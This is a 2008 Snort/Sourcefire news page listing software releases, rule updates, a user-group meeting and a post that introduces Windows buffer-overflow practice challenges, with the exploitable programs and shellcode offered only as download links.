the de facto standard in IPS  
Got Source? About Snort About Sourcefire Snort FAQ
Sourcefire Network Security - the creators of Snort
Snort News Snort Downloads Snort Rules Snort Docs Snort Training Snort Forums Snort Community Snort Store
Search Site
Search Rules
Account
email
password
not registered?
can't login?
user preferences

News

Submit News News Feeds Questions?
-
(Displaying 1 - 10 of 715)
Snort 2.8.3 Now Available Snort Release Team (Sourcefire) @ September 05, 2008 15:04:34
Snort 2.8.3 is now available on snort.org, at http://www.snort.org/dl/

Snort 2.8.3 introduces:

- MPLS decoding support

- Improvements to HTTP Inspect to provide more information to the rules
language

- Several other improvements and fixes

Please see the release notes and changelog for more details.

Happy Snorting!
The Snort Release Team
OSSEC HIDS 1.6 Released Mike Guiterman (Sourcefire) @ September 02, 2008 15:46:51

From Daniel Cid of the OSSEC Team

"The OSSEC team is pleased to announce the general availability of
OSSEC version 1.6.

OSSEC is an Open Source Host-based Intrusion Detection System. It
performs log analysis, integrity checking,
Windows registry monitoring, rootkit detection, real-time alerting and
active response. It runs on most operating systems,
including Linux, OpenBSD, FreeBSD, MacOS, Solaris and Windows.

This new version delivers the most comprehensive update to OSSEC in
its history, with numerous new features and bug fixes, including:

* New multi-server architecture
* New platform support for Microsoft Vista (and Server 2008)
* New platform support for VMware ESX
* Added active response module for Windows
* CIS benchmarks on Linux (through the policy auditing)
* Added the VMWare Security hardening guideline to the policy auditing
* Added support for McAfee VirusScan Enterprise logs
* Added support for VMware ESX hostd logs
* Added support for Mac OS FTP server logs
* New tools to better manage the data stored (syscheck_control,
rootcheck_control, log_test)

And much more… Check the release message for more information:
http://www.ossec.net/main/ossec-v16-released

Download it from: http://www.ossec.net/main/downloads"

Congratulations on the release guys!

VRT Certified Rules Update Available Sourcefire VRT (Sourcefire) @ August 26, 2008 16:11:32

The Sourcefire VRT has added multiple rules in the web-client and exploit categories to provide coverage for emerging ActiveX control and exploit threats.

These rules are available to subscribers only until Thursday, September 25, 2008.

Download rules | view advisory | view changelog | subscribe now.
Snort Users Group Melbourne - Sept. 10, 2008 Mike Guiterman (Sourcefire) @ August 26, 2008 15:50:32

Hi Everyone,

Here are the details for a Snort Users Group meeting in Melbourne, Australia.

Date: Wednesday the 10th of September
Location: Misty Place, 3 - 5 Hosier Lane, Melbourne
Time: 5:00 PM (for 5:30 PM presentation) - 6:30 PM

The Snort Users Group Meeting gives you a chance to meet and greet fellow Snort Users, give your input for future user group presentations, and find out more about Snort 3.0.

Bar snacks and refreshments will be provided by Sourcefire®, the creators of Snort.

Please RSVP by email to kelvin.rundle@sourcefire.com by 5:00 PM on the 8th of September.
Defcon, testing and exploiting Lurene Grenier VRT (Sourcefire) @ August 22, 2008 17:03:13
This year at Defcon Immunity trotted out the first iteration of their NOP cert test, and I had the pleasure of giving it a test run. I still think it's a great indicator of ability, despite the Immunity tools focus; I'm not a user of any of their tools generally, but I managed to pull off the hardest level test in a modest time.  It got us thinking on the way home, where does one go from the bar set by the NOP to get to the next level in terms of exploit development skill? In this vein I've thrown together a few windows executables, and in a nod to Gera of Core, they're called Advanced Windows Buffer Overflows (AWBOs).

We've set up a few ground rules and a basic set up to keep things moving along:

1) All exploits are performed in Windows 2000 SP4 unless otherwise specified.  Sometimes, otherwise will be specified.
2) Exploits will use the provided shellcode, or ret2lib.
3) You may not return to hard coded stack addresses.
4) No source code will be provided - just like the NOP cert.

Standard tools used are cygwin with perl, and windbg, installation in vmware a plus. The shellcode provided is the amazing windows exec shellcode from metasploit set up to run calc.exe.

I can say that all of these are exploitable, and they run through a progression, so try to do each of them in the most straight forward way possible. We'll be skipping awbo1.exe as it's very similar to one of immunity's tests (as far as my memory serves). They'll be released slowly over the next few months. Feel free to send in your solutions, or ask for tips. All of the examples have been play tested by the VRT analysts team, and are assured to be exploitable.

"This next test could take a very,  very long time. If you become lightheaded from thirst, feel free to pass out. An intubation associate will be dispatched to revive you with peptic salve and adrenaline."

Awbo2.exe download and shellcode download
VRT Certified Rules Update Available Sourcefire VRT (Sourcefire) @ August 19, 2008 17:10:56

The Sourcefire VRT has added multiple rules in the spyware-put, web-client and sql categories to provide coverage for emerging spyware, ActiveX control and SQL injection threats.

These rules are available to subscribers only until Thursday, September 18, 2008.

Download rules | view advisory | view changelog | subscribe now.
VRT Certified Rules Update Available Sourcefire VRT (Sourcefire) @ August 12, 2008 18:22:33

The Sourcefire VRT is aware of multiple vulnerabilities affecting Microsoft products.

These rules are available to subscribers only until Thursday, September 11, 2008.

Download rules | view advisory | view changelog | subscribe now.
OfficeCat Update Available Sourcefire VRT (Sourcefire) @ August 12, 2008 17:13:59

The OfficeCat tool has been updated to include detection for a vulnerability in Microsoft PowerPoint.

Download zip archive | Download Linux-wine archive | view advisory.
DNS Vulnerability Paper VRT (Sourcefire) @ August 11, 2008 15:38:33
Now that Defcon is over and the Kaminsky DNS Vulnerability is completely out in the open, the Sourcefire VRT has a new whitepaper that discusses the issue and suggests detection methods using Snort rules. Download it here.
Daemonlogger v1.1 Released Mike Guiterman (Sourcefire) @ August 07, 2008 11:16:24

Marty released Daemonlogger 1.1 yesterday.  In this release:

  • -M switch added to perform disk utilization-based rollovers and pruning
  • Bug fix related to file pruning reported by Wesley Shields

Daemonlogger v1.1 can be downloaded at:  http://www.snort.org/users/roesch/Site/Daemonlogger/Daemonlogger.html

Enjoy!
-
(Displaying 1 - 10 of 715)
site feedback | Terms of Use | Privacy Policy | forum archives ©2008 Snort and Sourcefire are registered trademarks of Sourcefire, Inc. All rights reserved.